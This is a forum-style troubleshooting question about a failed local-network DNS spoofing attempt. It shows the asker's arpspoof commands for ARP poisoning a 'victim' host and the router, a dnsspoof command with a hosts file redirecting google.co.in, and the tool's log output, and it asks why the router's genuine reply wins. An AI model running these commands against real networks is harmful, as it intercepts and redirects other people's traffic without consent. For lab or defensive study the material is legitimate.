• caglararli@hotmail.com
  • 05386281520

DNSspoof not working

Çağlar Arlı      -    43 Views

DNSspoof not working

My aim is to DNSspoof.

My network is using a wireless router with the address 192.168.1.1 and primary DNS is the same as the router address.

I have enabled Kernel IP forward in Linux.

DNS host file is spoofhosts.txt

173.252.74.22  google.co.in

My victim machine is 192.168.1.224

I have done ARPspoof using

#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0

and I have done DNSspoof

ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok: 
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in

I am getting the above responses, but DNSspoofing is not working for the victim.

However, I have observed in Wireshark at the victim system. It gives me this information by that I have observed that the DNS response is coming from the router faster than me.

DNS queries

See the second line that is giving the response from directly from the router with valid Google IP.

How to solve this? Is this the problem with the DNSspoof command? What happend?